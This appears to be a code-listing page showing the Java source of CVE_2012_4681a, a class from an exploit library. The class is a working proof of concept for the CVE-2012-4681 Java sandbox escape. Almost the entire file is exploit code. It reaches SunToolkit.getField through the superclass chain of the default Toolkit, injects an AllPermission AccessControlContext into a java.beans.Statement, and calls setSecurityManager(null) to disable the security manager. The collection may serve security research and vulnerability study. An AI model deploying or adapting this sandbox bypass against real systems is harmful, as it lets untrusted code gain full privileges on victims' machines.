Package cve20124681

Source Code of cve20124681.CVE_2012_4681a

/**
* Copyright (c) 2013-2014
*
* All rights reserved.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
* The Java-Exploit-Library is licensed under the Creative Commons
* Attribution-ShareAlike 4.0 International License.
*
* Please see the provided LICENSE.txt for a full copy of the agreement.
*/

package cve20124681;

import java.awt.Toolkit;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.MalformedURLException;
import java.net.URL;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;

/*
* This is the same as CVE_2012_4681, except that we use a simpler way to get
* a handle to SunToolkit.
*/
public class CVE_2012_4681a {

  public final static Object o = null;

  public static void main(String[] args) throws Throwable {
    System.setSecurityManager(new SecurityManager());
    System.out.println("SecurityManager: " + System.getSecurityManager());

    disableSecurity();
    System.out.println("SecurityManager: " + System.getSecurityManager());
  }

  private static void disableSecurity() throws Throwable {
    Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
    overrideStatementAccessControlContext(localStatement);
    localStatement.execute();
  }

  private static void overrideStatementAccessControlContext(Statement statement) throws Throwable {
    AccessControlContext acc = createDummyAccessControlContext();
    Field privateField = getPrivateField(Statement.class, "acc");
    privateField.set(statement, acc);
  }

  private static AccessControlContext createDummyAccessControlContext() throws MalformedURLException {
    Permissions permissions = new Permissions();
    permissions.add(new AllPermission());
    ProtectionDomain protectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), permissions);
    return new AccessControlContext(new ProtectionDomain[] { protectionDomain });
  }

  private static Field getPrivateField(Class<?> clazz, String fieldName) throws Throwable {
    Expression localExpression = new Expression(loadSunToolkit(), "getField", new Object[] { clazz, fieldName });
    localExpression.execute();
    return (Field) localExpression.getValue();
  }

  // alternative to get a handle to SunToolkit, at least on OSX
  private static Class<?> loadSunToolkit() throws Throwable {
    Toolkit defaultToolkit = Toolkit.getDefaultToolkit();
    Class<?> c2 = defaultToolkit.getClass().getSuperclass().getSuperclass();
    return c2;
  }
}
TOP

Related Classes of cve20124681.CVE_2012_4681a

TOP
Copyright © 2018 www.massapi.com. All rights reserved.
All source code are property of their respective owners. Java is a trademark of Sun Microsystems, Inc and owned by ORACLE Inc. Contact coftware#gmail.com.